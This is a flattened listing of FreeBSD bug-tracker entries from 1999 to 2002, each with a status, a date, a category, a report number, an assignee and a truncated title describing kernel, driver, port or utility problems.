FreeBSD 3.3 (CDROM) tested o [1999/11/17] i386/14946 mjacob rmt - remote magtape protocol s [1999/12/14] kern/15478 incorrect utmp/wtmp records update upon c o [1999/12/17] kern/15542 de suddenly stops working o [1999/12/23] misc/15662 markm [PATCH] perl5 Sys::Hostname fails if no P o [1999/12/26] kern/15707 dillon bad trap in mprotect o [2000/01/01] kern/15825 dillon Softupdates gets behind, runs the system s [2000/01/02] i386/15845 Driver for RealTek 8029 f [2000/01/03] bin/15877 tobez Perl 5.00503 interpreter crashes with a s o [2000/01/12] kern/16090 mdodd No buffer space available a [2000/01/22] kern/16299 tmm nfs.ko can be unloaded when nfsd is runni f [2000/01/24] ports/16343 reg bsd.port.mk cannot override make.conf. o [2000/02/08] kern/16587 cg Can't record with newpcm & CS4236 (AW35/P o [2000/02/10] kern/16644 Bad comparsion expression in bpf_filter.c o [2000/02/21] conf/16879 tanimura Sound drivers seem to be using shared irq o [2000/02/23] conf/16948 qa Sysinstall/disklabel: bad partition table o [2000/02/25] misc/16991 jhb booting install disk and USB s [2000/03/01] misc/17108 SecureRPC not supported in mount_nfs comm o [2000/03/10] misc/17310 wpaul NIS host name resolving may loop forever o [2000/03/16] kern/17422 bde 4.0-STABLE: top: nlist failed o [2000/03/20] kern/17504 ken Another Micropolis Synchronize Cache Prob f [2000/03/20] misc/17517 wpaul 100/10baseT card resets under load s [2000/03/21] conf/17540 NIS host lookups cause NFS mounts to wedg f [2000/03/21] kern/17542 greid random static with GUS PnP o [2000/03/24] misc/17584 groudier fatal SCSI error with a Symbios 53c875 co o [2000/03/27] i386/17626 green sshd cores when I scp to it o [2000/03/28] alpha/17637 billf misconfigured syscons bell causes panic o o [2000/03/29] i386/17662 gibbs cam_xpt.c incorrectly disables tagged que o [2000/03/31] i386/17713 gibbs MAKEDEV and /stand/sysinstall goofups wit o [2000/04/04] i386/17800 bde [PATCH] problem with statclock initializa f [2000/04/06] kern/17829 The dc driver is seriously broken f [2000/04/07] bin/17843 ftpd fails to set cwd with mode 700 NFS m f [2000/04/10] kern/17905 dillon 4.0-SNAP keep on crashing every 3 days o [2000/04/11] i386/17926 yokota psm device problems with apm resume o [2000/04/12] kern/17961 n_hibma Fatal Trap 12. Page fault while in kernel o [2000/04/12] kern/17965 silby vr (MII-bus version in 4.0 ONLY) driver l o [2000/04/14] kern/18012 adrian vnode_free_list corruption, "free vnode i o [2000/04/17] misc/18065 mdodd FREEBSD 4.0 crashes on boot Compaq Prolia s [2000/04/23] bin/18181 Getty can fail to observe :de: specificat f [2000/04/23] i386/18185 gibbs Adaptec 3950U2 errors during boot/probe o [2000/04/24] kern/18200 mdodd 3com 3c509b recognized twice during boot f [2000/04/25] kern/18209 green rlimits are never checked in exec() if ex f [2000/04/28] kern/18285 the system froze when use scon -s 50 o [2000/05/02] kern/18345 cg sbc / pcm not fully recognizing AWE64 o [2000/05/02] kern/18348 yokota tags o [2000/07/19] kern/20040 msmith Toshiba 2775 hangs after pcib0 driver is o [2000/07/25] misc/20172 byacc 1.9 fails to generate $default tran o [2000/07/27] kern/20234 green panic(): lockmgr: pid 259, not exclusive o [2000/07/29] conf/20282 qa sysinstall does not recover some /etc fil f [2000/07/31] kern/20335 yokota S3Trio64V+ is detected as CGA by syscons p [2000/08/02] bin/20373 Setting breakpoints in shared objects bro o [2000/08/08] ports/20490 tg Termios timeout parameters, VMIN, VTIME, f [2000/08/09] i386/20507 yokota Mouse freezes in 4.0-release after some u o [2000/08/10] misc/20521 mjacob /etc/rmt several problems o [2000/08/10] kern/20523 bde Support for PCI multiport cards for sio d o [2000/08/13] kern/20572 marcel cannot safely remove COMPAT_43 from the k o [2000/08/14] kern/20609 dillon panic: vm_fault: fault on nofault entry, o [2000/08/15] bin/20633 fdisk doesn't handle LBA correctly f [2000/08/17] kern/20689 groudier Newbusified version of ncr driver does no o [2000/08/18] kern/20708 imp Adaptec 1542 ISA SCSI Controller not dete f [2000/08/22] bin/20779 assar junk pointer error causes kpasswd to fail o [2000/08/26] misc/20861 libc_r does not honor socket timeouts o [2000/08/28] gnu/20912 mp gdb does not recognise old executables. f [2000/08/30] bin/20952 markm ftpd doesn't honor account expiration tim o [2000/08/31] kern/20958 mdodd ep0 lockup with ifconfig showing OACTIVE o [2000/09/07] misc/21089 vi silently corrupt open file on SIGINT w f [2000/09/08] kern/21139 ken IBM DNES drives need 'quirk table' entry. p [2000/09/11] bin/21208 tar does not support 2.5 GB file o [2000/09/11] kern/21209 groudier scsi ncr driver installs instead of scsi a [2000/09/13] bin/21248 kris openssl dumps core with blank passwords o [2000/09/14] gnu/21260 buffer overrun in uux o [2000/09/14] ports/21264 markm tn3270 port receives segmentation fault o [2000/09/14] gnu/21276 libI77 is unable to handle files >2Gbytes o [2000/09/15] kern/21304 wpaul dc0 watchdog timeouts on NetGear FA310TX o [2000/09/15] kern/21305 roger bktr driver dosn't send signals in contin s [2000/09/18] misc/21384 greid pcm driver has static in recorded audio o [2000/09/19] misc/21406 freebsd's bootinst or booteasy overwrites p [2000/09/20] gnu/21433 g++ optimiser produces bad code on right o [2000/09/21] kern/21461 imp ISA PnP resource allocator problem o [2000/09/21] kern/21463 emulationLinux compatability mode should not allow f [2000/09/27] bin/21603 green Can't change user passwords on 4.1.1-STAB o [2000/09/28] kern/21642 Compaq Netelligent 10/100 card (TI Thunde o [2000/10/02] docs/21708 jlemon kqueue/kevent man pages isn't specific ab o [2000/10/02] ports/21714 sobomax audio problem with nil o [2000/10/05] kern/21771 murray Fix for sppp and Cronyx drivers update a [2000/10/06] kern/21808 [patches] msdosfs incorrectly handles vno o [2000/10/15] misc/21998 green ident only for outgoing connections o [2000/10/19] kern/22142 securelevel does not affect mount f [2000/10/24] misc/22284 Change (SunOS) NIS passwd error o [2000/10/25] bin/22291 getcwd() fails on recently-modified NFS-m o [2000/10/30] kern/22417 gibbs advansys wide scsi driver does not suppor o [2000/11/05] bin/22614 billf pam_ssh dumps core f [2000/11/05] kern/22624 Interrupt conflict btw. vga and Ethernet f [2000/11/06] gnu/22635 Why don't you use truncate(2) in libI77 o [2000/11/13] kern/22826 emulationMemory limits have no effect in linux com o [2000/11/14] bin/22846 Routed does not reflect preference of Int f [2000/11/15] kern/22862 ncr probe fails with CACHE TEST FAILED: ? o [2000/11/18] kern/22943 emulationProblem with linux emulation o [2000/11/18] i386/22944 isa_dmainit fails on machines with 512MB a [2000/11/18] kern/22947 jon IBM 10/100 EtherJet Cardbus (Xircom X3201 f [2000/11/23] gnu/23058 ncurses: tgoto_internal() ugliness o [2000/11/25] bin/23098 ambrisko If installing on a serial console, enable o [2000/11/26] ports/23125 mbr Successful emulation of StarOffice depend f [2000/11/30] conf/23192 FTP REALLY slow on internal NIC aswel (12 o [2000/12/04] bin/23269 green OpenSSH TIS Authentication support has br o [2000/12/07] bin/23352 [SECURITY] buffer overflow in opieftpd f [2000/12/07] misc/23364 gethostbyaddr takes longer or locks up an o [2000/12/08] kern/23400 rwatson IPsec transport mode precludes filtering o [2000/12/12] kern/23515 get error in messages system log "Dec 11 o [2000/12/13] kern/23535 imp 4.x kernels seem to no longer support Ada o [2000/12/14] misc/23561 emulationLinux compatibility mode does not support o [2000/12/18] ports/23638 kuriyama Add turbine-pool.jar to Cocoon CLASSPATH o [2000/12/22] kern/23771 bridge/firewall doesn't work as in bridge o [2000/12/26] bin/23866 dwmalone patch for pointing out current date o [2001/01/02] kern/24032 markm rndcontrol and pccardd use of interupt ha o [2001/01/03] kern/24059 n_hibma USB support broken in SMP kernel o [2001/01/04] kern/24070 n_hibma uhci USB driver disables port on reatachi o [2001/01/04] kern/24074 mdodd Properties of token-ring protocol must be f [2001/01/05] kern/24085 syncing on shutdown leaves filesystem dir o [2001/01/06] kern/24100 imp Having a 3c589 PCMCIA/PCCARD inserted pre o [2001/01/06] docs/24125 wes connect(2) can yield EWOULDBLOCK/EAGAIN f [2001/01/10] conf/24238 First physical interface always has IPv6 o [2001/01/12] bin/24271 dumpon should check its argument more o [2001/01/16] misc/24391 cannot kill amd after interface disappear o [2001/01/19] bin/24461 pirzyk Being able to increase the YP timeout wit o [2001/01/19] bin/24472 libc_r does not honor SO_SNDTIMEO/SO_RCVT s [2001/01/23] misc/24590 timezone function not compatible witn Sin o [2001/01/25] kern/24629 ng_socket failes to declare connected dat o [2001/01/25] bin/24632 libc_r delicate deviation from libc in ha o [2001/01/25] misc/24641 pthread_rwlock_rdlock can deadlock o [2001/01/28] bin/24691 map-mbone segfaults at getsockname o [2001/01/29] ports/24711 portmgr ${MAKEFILE} causing trouble with ports o [2001/02/09] kern/24982 stack gap usage o [2001/02/10] i386/24997 /boot/loader cannot handle extended dos p o [2001/02/11] ports/25007 max telnetx problem on 4.x o [2001/02/12] kern/25038 murray dhcp client could not set hostname on boo o [2001/02/13] kern/25067 adrian able to mount a pathname > 80 char. but u f [2001/02/14] kern/25093 4.2-STABLE does not recognize PCNet-ISA+ a [2001/02/19] kern/25201 imp pccard event and syscons beep duration de o [2001/02/19] kern/25213 peter Bus abstraction interface doesn't allow p o [2001/02/21] kern/25248 bde sys/user.h needs sys/param.h, but doesn't f [2001/02/21] kern/25261 gibbs ahc0 no active SCB errors when booting of o [2001/02/21] ports/25272 rse Using eperl as cgi/nph binary executor ca s [2001/02/23] bin/25337 rwatson dmesg -a should be restricted o [2001/02/28] bin/25461 qa sysinstall's fdisk and disklabel don't wo o [2001/03/03] kern/25511 ioctl(fd, FIONREAD, &c) on a FIFO (not PI o [2001/03/05] bin/25542 /bin/sh: null char in quoted string o [2001/03/07] misc/25585 sed.test 8.16 puts bugged sed into infini o [2001/03/07] bin/25586 green Password expiration doesn't work after up o [2001/03/13] kern/25781 Statclocks cannot be disables on ServerWo o [2001/03/14] misc/25801 imp change IP-address on pccard (3Com) fails o [2001/03/15] bin/25826 nfsd -t -h adr1 -h adr2 doesn't work o [2001/03/16] misc/25851 qa Security hole in anonymous FTP setup scri o [2001/03/17] bin/25886 cgetset(3) doesn't get cleared when switc o [2001/03/19] bin/25929 Can't use MAKEDEV in fixit mount o [2001/03/20] kern/25949 msmith camcontrol doesn't find new drives or RAI o [2001/03/22] kern/25986 silby Socket would hang at LAST_ACK forever. o [2001/03/22] misc/26002 n_hibma Poor read/write performance on uhci USB c o [2001/03/22] kern/26013 Linksys (rev 3) USB 100TX NIC causes infi o [2001/03/23] ports/26036 dima acroread4 produces invalid postscript in o [2001/03/25] kern/26078 Jails cannot connect to the main server a o [2001/03/26] bin/26093 markm pam_unix rejects authenticating accounts o [2001/03/27] kern/26142 Unlink fails on NFS mounted filesystem o [2001/03/28] kern/26171 emulationnot work Linux-emulator, but hi is work i o [2001/03/31] i386/26261 silo overflow problem in sio driver o [2001/04/02] bin/26307 libc_r aborts when using the KDE media pl o [2001/04/03] kern/26309 PPPoE client panics in kernel - fxp probl o [2001/04/03] misc/26320 alfred mountd breaks IRIX automounter a [2001/04/05] gnu/26362 "cvs server" doesn't honour the global -- o [2001/04/08] kern/26430 cg -CURRENT panics on cat /dev/dsp or cat /d o [2001/04/09] ports/26464 mbr Citrix client no longer reads files in lo o [2001/04/10] misc/26486 setnetgrent hangs when netgroup contains o [2001/04/12] kern/26506 phk sendto() syscall returns EINVAL in jail e o [2001/04/14] kern/26567 Mouse driver will not properly restart if o [2001/04/14] kern/26568 Mouse driver will die if you move mouse a o [2001/04/19] kern/26704 AHA-2940[UW] gives MPARERR on cold boot ( o [2001/04/23] ports/26797 assar arla-0.34.6 causes kernel panic/page faul o [2001/04/25] bin/26842 dd dump with h flag takes a very long time o [2001/04/25] ports/26848 sobomax jre port core dumps a [2001/04/25] bin/26869 sheldonh vi(1) crashes in viewing a file with long o [2001/04/27] misc/26897 qa 4.3R sysinstall fails to create swap part o [2001/04/30] bin/26996 green sshd fails when / mounted read-only f [2001/05/01] kern/27020 FreeBSD 4.3RC compiled with an SMP kernel o [2001/05/02] ports/27052 portmgr libtool port broken in 4.3 RELEASE o [2001/05/04] bin/27086 green OpenSSH does not set X11 forwarding a [2001/05/08] ports/27202 dougb mail/pine sucks rocks when saving over NF o [2001/05/09] bin/27230 nectar Users after NIS lines in /etc/passwd o [2001/05/09] kern/27237 silby Watchdog Timeouts under EXCESSIVE load o [2001/05/09] kern/27242 SIGHUP propagation failure to processes o f [2001/05/10] i386/27247 Panic on install - "page fault syncing di a [2001/05/10] kern/27262 process won't be terminated after CPUTIME o [2001/05/17] ports/27419 ports E-FancyLauncer clones itself over and ove o [2001/05/20] kern/27474 Interactive use of user PPP and ipfilter o [2001/05/21] misc/27498 grog vinum crashed after 'vinum dumpconfig' o [2001/05/21] kern/27522 des linprocfs:/proc/stat does not handle SMP o [2001/05/22] kern/27543 des /proc/cpuinfo does not handle SMP hosts o [2001/05/23] docs/27605 doc Cross-document references () o [2001/05/27] kern/27694 cg Panic in csa(4) f [2001/05/29] i386/27729 qa the ls120 device "afd" does not show up u o [2001/06/04] ports/27875 ports invoked on boot, SIGHUP is delivered and a [2001/06/05] misc/27893 sos can't burn audio cds on LG CD-RW CED-8083 o [2001/06/05] misc/27896 Error in /etc/exports invalidates entire o [2001/06/07] ports/27925 portmgr index is not updated when it html manpage o [2001/06/07] ports/27926 portmgr bsd.port.mk does not handle MLINKS with h o [2001/06/09] bin/27988 [PATCH] let pam_ssh.so explicitly start s o [2001/06/09] kern/27995 src/sys/pci if_pcn.c revision 1.21 resp. o [2001/06/12] misc/28095 [PATCH] pax may descend into directories o [2001/06/12] ports/28102 assar Recent changes to 4.3-STABLE break arla-0 o [2001/06/14] ports/28155 portmgr DESTDIR is used incorrectly in bsd.port.m o [2001/06/15] kern/28173 Problem with Touchpad on Inspiron 5000e a [2001/06/15] misc/28188 Cron is being started to early in /etc/rc o [2001/06/16] kern/28218 A peer of TCP socket cannot detect termin o [2001/06/16] bin/28221 eric dialog(1) segfaults (due to the bug in li o [2001/06/17] bin/28223 su doesn't look at login.conf all the tim o [2001/06/17] bin/28224 ftpd doesn't honor invalid shelll in logi o [2001/06/20] bin/28311 markm ftpd and sshd do not honor expired pw ent o [2001/06/23] ports/28378 jedgar p5-Net-IRC-0.70_1 eats irc text with col o [2001/06/24] ports/28398 ports ja-dvips cannot find tex.pro o [2001/06/25] kern/28417 arplookup uses potentially unprotected st o [2001/06/26] bin/28424 mtree fails to report directory hierarchy o [2001/06/26] kern/28434 cs0's promiscuous mode does not work o [2001/06/27] misc/28442 hot rebuild on Compaq Intergrated Smart A o [2001/06/28] ports/28491 kiri www/w3-4 port: mismatch between pkg-plist f [2001/06/28] kern/28497 dmesg corrupted buffer/output o [2001/06/29] misc/28508 problems with backup to Tandberg SLR40 st o [2001/06/30] i386/28536 writing to corrupted msdosfs causes kerne f [2001/06/30] bin/28552 EUC support of wcstombs(3) is broken for o [2001/07/01] i386/28592 Please support boot from ATA RAID-0 devic o [2001/07/04] kern/28692 cg ICH sound driver hangs kernel o [2001/07/04] kern/28713 luigi NEW IPFW FEATURE [PATCHES]: Dynamic rule o [2001/07/06] kern/28768 The system doesn't get connects on one of o [2001/07/06] bin/28773 [PATCH] Bug in pw, no $ in username o [2001/07/07] bin/28798 mikeh mail(1) with a pager (more) requires fg/C o [2001/07/07] i386/28802 3com Performance Pro modem conflicts with o [2001/07/09] kern/28840 gibbs Possible interrupt masking trouble in sys o [2001/07/09] bin/28852 cracauer behavior of /bin/sh with -e option looks o [2001/07/09] kern/28856 3COM PCI FaxModem with shared IRQ causes o [2001/07/11] ports/28889 lioux qpopper-4.0.3 error: Insufficient room to o [2001/07/12] i386/28928 wpaul dual starfire nic doesn't seem to work (a o [2001/07/13] bin/28935 dwmalone syslogd -u doesn't treat * as "all levels f [2001/07/15] i386/28985 Installing FreeBSD 4.3 on a Dell Optiplex o [2001/07/16] bin/29026 traceroute -s option allows any IP addres o [2001/07/17] bin/29049 green multi-user with star o [2001/09/15] misc/30590 /etc/hosts.equiv and ~/.rhosts interactio o [2001/09/15] kern/30592 roam [PATCH] panic: static sysctl oid too high o [2001/09/17] kern/30630 fenner Failure to check for existence of interfa o [2001/09/18] bin/30654 Added ability for newsyslog to archive lo o [2001/09/21] misc/30708 DHCP and multiple interfaces o [2001/09/21] kern/30712 fatal kernel trap during ufs_rename o [2001/09/21] ports/30728 portmgr pkg_add causes install of multiple versio o [2001/09/23] kern/30755 It is impossible to mount CD-ROM in some o [2001/09/23] ports/30767 anholt silly links break XFree-4 port if /usr/X1 o [2001/09/24] kern/30798 contigfree() doesn't o [2001/09/25] kern/30820 sound PCM sound fails o [2001/09/25] ports/30823 ports New port: KinterbasDB, Python module to a o [2001/09/26] bin/30837 Sysinstall doesn't set the schg flag on t o [2001/09/30] ports/30947 ports mail/mahogany fails to build, conflicts w o [2001/09/30] kern/30948 ls'ing mounted brand new floppy locks up o [2001/09/30] kern/30952 kernel panics with 3C905[BC] cards / xl d o [2001/10/01] kern/30958 QUOTA with 0 bytes in quota.user hangs up o [2001/10/01] bin/30959 newfs -i x dumps core for small values of f [2001/10/01] bin/30966 fenner TCPdump repeating on Radius accounting pa o [2001/10/01] kern/30971 peter NFS client modification time resolution i o [2001/10/02] i386/30991 pcm in PNP-OS mode vs. non-PNP-OS mode po o [2001/10/02] bin/30993 xxgdb cannot open source file o [2001/10/04] bin/31029 cjc syslogd remote logging back down o [2001/10/04] i386/31035 Smart Array & SMP hangs on Proliant 1600 o [2001/10/04] bin/31045 routed dumps core o [2001/10/04] kern/31046 Linux OpenGL programs do not work under t o [2001/10/04] kern/31047 Linux programs do not dump core in linux o [2001/10/06] kern/31084 imp xe driver device probe fails in CIS tuple o [2001/10/06] kern/31085 kernel panic on tftp only pxeboot o [2001/10/07] kern/31102 lge + Pentium III data transmission probl o [2001/10/07] kern/31103 nfs read i/o error when nfs-mounting onto o [2001/10/07] ports/31113 portmgr bsd.ports.subdir.mk: remove NOCLEANDEPEND o [2001/10/08] kern/31147 Kernel panics (double fault) in some "net o [2001/10/09] ports/31184 ports Latex2html problem o [2001/10/10] ports/31191 ports netsaint - plugins sometimes not found o [2001/10/10] kern/31203 imp Cardbus xl driver broken on -CURRENT o [2001/10/11] ports/31216 znerd New port: devel/plist-builder o [2001/10/12] kern/31238 `hpijs' process hangs unkillably in `devb o [2001/10/14] conf/31280 gshapiro /etc/rc.network NFS server startup broken o [2001/10/15] bin/31306 qa sysinstall fails to create non-root parti o [2001/10/17] bin/31339 make's .if processing buggy o [2001/10/18] misc/31363 sysinstall "partition editor" silently co o [2001/10/21] kern/31398 cg newpcm does not play back the tail of sou f [2001/10/21] ports/31422 ache Does pkg_delete have to erase /usr/local/ f [2001/10/24] kern/31471 Specific IPFW's FWD rule crashes the kern o [2001/10/24] i386/31481 FreeBSD does Not find disk drives with Co o [2001/10/25] kern/31492 Panic in sysctl_remove_oid. o [2001/10/25] ports/31494 ache mod_perl fixes for apache13 port o [2001/10/26] ports/31511 obrien g++30 produces binaries which SIGBUS when o [2001/10/26] kern/31515 Use of USB Keyboard crashes 4.4 during in o [2001/10/30] conf/31631 "MAC address" can't be acquired properly. o [2001/10/31] kern/31659 n_hibma USB controller driver will die after some o [2001/10/31] bin/31661 pthread_kill signal handler doesn't get s s [2001/10/31] misc/31670 scsi Wide-Ultra 10k SCSI 3 drive is not recogn o [2001/10/31] bin/31678 A bug in handling an error reading a CD-R f [2001/11/01] bin/31692 2872-or-less-byte ftp binary transfer fro o [2001/11/01] ports/31699 ports The graphics/gd2 port conflicts with grap o [2001/11/03] kern/31746 failed connect(2) seems to cause problems f [2001/11/05] kern/31768 darrenr Use of fastroute in IPFilter reboots the o [2001/11/05] i386/31771 brian PPP compares CHAP81 response case sensiti o [2001/11/05] kern/31790 problem with NFS and jail() o [2001/11/05] ports/31793 kuriyama snmpd loops on udp.ipv6UdpTable.ipv6UdpEn o [2001/11/06] kern/31804 Clearing PME mode kills network performan o [2001/11/07] ports/31819 jmz ports/ispell install doesn't work o [2001/11/07] bin/31835 murray dhclient doesn't close FD's before spawni o [2001/11/07] bin/31837 qa sysinstall change mountpoint o [2001/11/07] kern/31839 mdodd ex0 panic if NIC not cabled a [2001/11/07] ports/31840 portmgr package naming inadequation (gnome vs gtk o [2001/11/07] i386/31845 Toshiba Satellite 2105CDS won't boot Free o [2001/11/08] bin/31860 read wont timeout on sockets if using thr o [2001/11/08] misc/31864 system header file attempts to redefine a o [2001/11/09] ports/31893 des gnats-3.113.1 conflicts with /usr/bin/sen p [2001/11/12] gnu/31929 GNU Tar shipped with FreeBSD handles rela o [2001/11/12] kern/31940 nge gigabit adapter link reset and slow t o [2001/11/13] i386/31967 reboot/shutdown hangs on Sony VAIO 505 w/ o [2001/11/14] kern/31979 Setup and boot locks Compaq Armada E500 l f [2001/11/17] ports/32063 znerd patch for /usr/ports/java/linux-jdk about o [2001/11/17] bin/32072 setuid w/o immutable flag o [2001/11/18] kern/32098 semctl() does not propagate permissions o [2001/11/19] kern/32118 21143 with dc driver will not select 10ba o [2001/11/19] ports/32121 anholt xf86cfg 4.1.0 writes bad "Chipset" value o [2001/11/20] kern/32124 Cannot set 128 bit wep key on prism2 (wi0 f [2001/11/21] bin/32175 green ssh-keygen -p core dumps f [2001/11/22] misc/32194 scsi Adaptec SCSI RAID 2100 fails by reboot o [2001/11/22] bin/32205 brian PPP login fails in LCP negotiation on opt o [2001/11/23] kern/32226 time of day clock runs fast (approx twice o [2001/11/23] ports/32234 portmgr Perl ports not $LOCALBASE clean o [2001/11/24] kern/32256 System crash/reboot when deleting file on f [2001/11/24] bin/32261 dump creates a dump file much larger than o [2001/11/26] alpha/32289 alpha memory management fault o [2001/11/26] bin/32295 pthread dont dequeue signals f [2001/11/27] kern/32331 system panic in quotaoff o [2001/11/27] kern/32338 Network to disk write performance low und o [2001/11/28] kern/32353 if kern.maxproc > 512 sybase ASE 11.9.2( o [2001/11/28] gnu/32365 obrien gcc optimiser bug with -O -march=i686 o [2001/11/29] bin/32374 vi -r doesn't work, file contained unexpe o [2001/12/06] kern/32556 sound system crashes when unloading sound modul o [2001/12/08] kern/32600 luigi [PATCH] incorrect handling of parent rule o [2001/12/08] bin/32619 des libfetch does not use RFC 1738's definito o [2001/12/08] misc/32631 imp installing 4.4 "mounting root from ufs:/d o [2001/12/09] ports/32663 kde kdelibs2 port potentially conflicts with o [2001/12/10] kern/32668 peter NFS directory removal problems manifested f [2001/12/10] bin/32686 wosch locate command dumps a core file with bro o [2001/12/11] misc/32699 Tulip ether card EN2242 (if_dc.c) use wro o [2001/12/11] ports/32700 assar inode changes for large o [2001/12/11] kern/32716 system hangs when running vid (usb webcam o [2001/12/11] bin/32717 brian ppp(8) change mss to wrong size o [2001/12/12] bin/32759 jmallett [PATCH] make(1) System V include behaviou o [2001/12/12] misc/32760 Please MFC /usr/include/malloc.h to -STAB f [2001/12/12] bin/32791 ru FreeBSD's man(1) utility vulnerable to ol o [2001/12/13] kern/32797 Problem with IPX and netgraph(4) o [2001/12/13] ports/32800 dec gated dies on ppp interface up/down o [2001/12/13] kern/32809 yet another panic while syncing disks aft o [2001/12/14] kern/32827 small SO_RCVTIMEO values are taken to be o [2001/12/14] ports/32844 kde exiting konq term emulator causes crash o [2001/12/21] kern/33074 joe USB printer support does not detect print o [2001/12/21] ports/33080 ume grkrellmvolume interferes with the abilit o [2001/12/21] ports/33082 ports audio/mxv fails to compile o [2001/12/22] kern/33085 jlemon Samba's NMBD cannot find alias interface o [2001/12/22] ports/33093 jdp cvsup SNAP_16_1e breaks by SIGILL during o [2001/12/24] kern/33138 pnp problem in 4.3, 4.4, 4.5 o [2001/12/24] kern/33143 Kernel panic in uhci_abort_xfer_end o [2001/12/24] bin/33155 green [PATCH] sshd can leave hanging processes o [2001/12/26] kern/33201 net/net_osdep.c:if_name is broken f [2001/12/26] misc/33213 ume rarpd fails to init IPv6 enabled interfac o [2001/12/30] kern/33344 memory leak in device resource config loa o [2001/12/30] kern/33346 jhb Kernel panic with SMP kernel o [2001/12/30] kern/33353 panic at odd times...idle, under no load, o [2001/12/30] misc/33370 Post configuration issue o [2002/01/01] ports/33440 portmgr Ports can not resume an interrupted downl o [2002/01/02] kern/33464 dillon soft update inconsistencies after system o [2002/01/03] bin/33515 amd incorrectly handles multi-homed nfs s o [2002/01/03] ports/33519 portmgr make index fails if PERL_VERSION is 5.6.1 o [2002/01/04] kern/33532 sound Playing audio on some soundcards with pcm o [2002/01/04] kern/33535 invalid kernel diagnostic while writing d f [2002/01/04] gnu/33551 cvs chokes on OpenBSD repositories f [2002/01/05] kern/33578 FreeBSD panics when accessing encrypted D o [2002/01/07] kern/33653 DSL PPPoE connection error on 4.5-PRERELE o [2002/01/07] misc/33672 sheldonh telnetd and mount_mfs signal handlers cal p [2002/01/09] misc/33723 select(2) implementation in threaded (-lc o [2002/01/09] kern/33738 argv == NULL is not handled correctly by o [2002/01/13] kern/33833 Correct kernel config for 4.4-RELEASE is o [2002/01/13] kern/33839 joe usb0: host controller halted (involving A o [2002/01/13] ports/33848 ports CUPS doesn't find parallel port o [2002/01/14] bin/33881 adduser additions: selectable crypt schem o [2002/01/15] ports/33927 ports ja-dvipdfm port requires texmf/dvips/base o [2002/01/15] ports/33929 doc Section 15.15 of the FreeBSD Porter's Han o [2002/01/15] ports/33931 mbr trouble installing StarOffice 5.2 over li o [2002/01/16] kern/33940 quotactl allows compromise gid-quotas o [2002/01/16] kern/33974 Can not record anything with emu10k1 on 4 f [2002/01/17] kern/33978 can't kill process o [2002/01/17] i386/33986 sound SMP and audio causes hard lockups (random o [2002/01/17] kern/34017 The siginfo_t passed to the signal handli o [2002/01/18] kern/34020 programs fail that poll(2) on fifos o [2002/01/18] bin/34030 miibus.ko can be loaded into the kernel w o [2002/01/18] kern/34031 hang with linux emulation in 4.5-RC o [2002/01/18] ports/34056 ports vmware2 complains of missing file f [2002/01/19] misc/34073 3com 3c980c runs "bursty" / freezes-unfre o [2002/01/20] i386/34092 reboot hangs the system (IBM PC Server 31 o [2002/01/21] gnu/34128 sdiff "e" doesn't work with some editors o [2002/01/21] ports/34153 andreas The apsfilter configure script adds bzip2 o [2002/01/23] kern/34205 joe detect USB memory device, But can not use o [2002/01/23] ports/34212 cpiazza Segmentation fault in audio/gmixer o [2002/01/24] kern/34228 Dual processor machine hangs at reboot o [2002/01/24] gnu/34246 joe CVS doesn't rebuild CVSROOT/options o [2002/01/25] kern/34266 SMP does not work on CPQ0579 System board o [2002/01/25] i386/34267 semenu FreeBSD hangs and reboots when overloaded o [2002/01/25] bin/34269 tcpdump -v incorectly identifies packets o [2002/01/25] misc/34270 man -k could be used to execute any comma f [2002/01/26] kern/34306 gibbs 4.5-RC panics on boot with half-supported o [2002/01/29] ports/34409 kuriyama prc-tools from ports fails to compile on f [2002/01/29] i386/34422 crash system wnen kill pppd with reattach o [2002/01/30] misc/34458 green 4.5S/sshd forwarding problems o [2002/01/30] ports/34467 portmgr bsd.port.mk is broken WRT USE_AUTOCONF_VE o [2002/01/31] ports/34480 anholt system hangs after killing xinit o [2002/02/01] i386/34536 accept() blocks other threads o [2002/02/01] bin/34539 [PATCH] fsck(8) doesn't account for negat o [2002/02/01] kern/34544 Kernel crash on fclose() of /dev/kbd1 whe o [2002/02/02] ports/34558 sobomax wxgtk-devel port broken o [2002/02/02] misc/34568 turning printer on and off hangs the comp o [2002/02/03] kern/34582 wpaul Support for D-Link DFE-690TXD Cardbus PC o [2002/02/03] bin/34586 sos burncd -t blank blanks CD o [2002/02/03] i386/34588 read-prefetch on VIA 686B IDE causes hang o [2002/02/04] kern/34619 TCP - FINs with different sequence number o [2002/02/06] kern/34672 imp NEWCARD panic. p [2002/02/06] bin/34682 fenner scanf/sscanf doesn't understand %lld f [2002/02/07] bin/34725 sos burncd cannot write audio file as the 1st o [2002/02/08] ports/34730 lioux new port qmail-scanner - a virus-scanning o [2002/02/09] kern/34764 cisco aironet driver freezes with toshiba o [2002/02/09] kern/34765 darrenr Unloading the ipl.ko module will panic th o [2002/02/10] kern/34801 darrenr TCP window size bug (afflicting IP Filter o [2002/02/10] bin/34811 sh: "jobs" is not pipeable f [2002/02/11] misc/34842 VmWare port + NIS causes "broadcast storm o [2002/02/12] ports/34893 deischen RUS-CERT Advisory 2002-02:01: Temporary f o [2002/02/13] i386/34902 FTP session causes server reboot o [2002/02/13] ports/34907 sf 4.5/ports/ftp/wget+ipv6 hangs top make s [2002/02/16] kern/35004 sound [PATCH] Fix for pcm driver lockups o [2002/02/17] kern/35061 After printing to HP Deskjet 656c USB pri o [2002/02/18] kern/35081 zebra routing problem - kernel bug??? p [2002/02/18] bin/35087 TAR does not recurse directories if it ru o [2002/02/18] misc/35104 Files end up being no bigger than 8192 by o [2002/02/19] misc/35116 keyinfo reports root's keyinfo o [2002/02/20] kern/35136 VLAN & bridging & MTU o [2002/02/20] misc/35145 cannot open /etc/termcap and no terminal o [2002/02/21] ports/35179 kris elm-2.5.5_1: bounce command doesn't work o [2002/02/21] ports/35183 portmgr postgresql-7.1 repo copy request o [2002/02/22] bin/35214 obrien dump program hangs while exiting o [2002/02/23] ports/35237 ports empty manpage installed by trafcount port o [2002/02/23] kern/35248 panic: ffs_valloc: dup alloc o [2002/02/23] misc/35267 after cvsup src-all for 4.5, /stand/sysin o [2002/02/25] bin/35307 standard include files are not standard c o [2002/02/25] bin/35309 umount -f does not work for ufs floppy o [2002/02/25] misc/35310 SSHing with expired password does not bri o [2002/02/25] ports/35320 ports linux-jdk-1.4 JVM fails when running Tomc o [2002/02/25] bin/35329 Linking against libc_r.* provokes nasty l o [2002/02/26] misc/35350 Can't boot on ASUS TXP4 o [2002/02/26] kern/35351 emu10k1: no posibility to record sound. K o [2002/02/26] ports/35353 green cfs strips eighth bit of file name on "ou o [2002/02/26] ports/35364 ports cdb port forgets 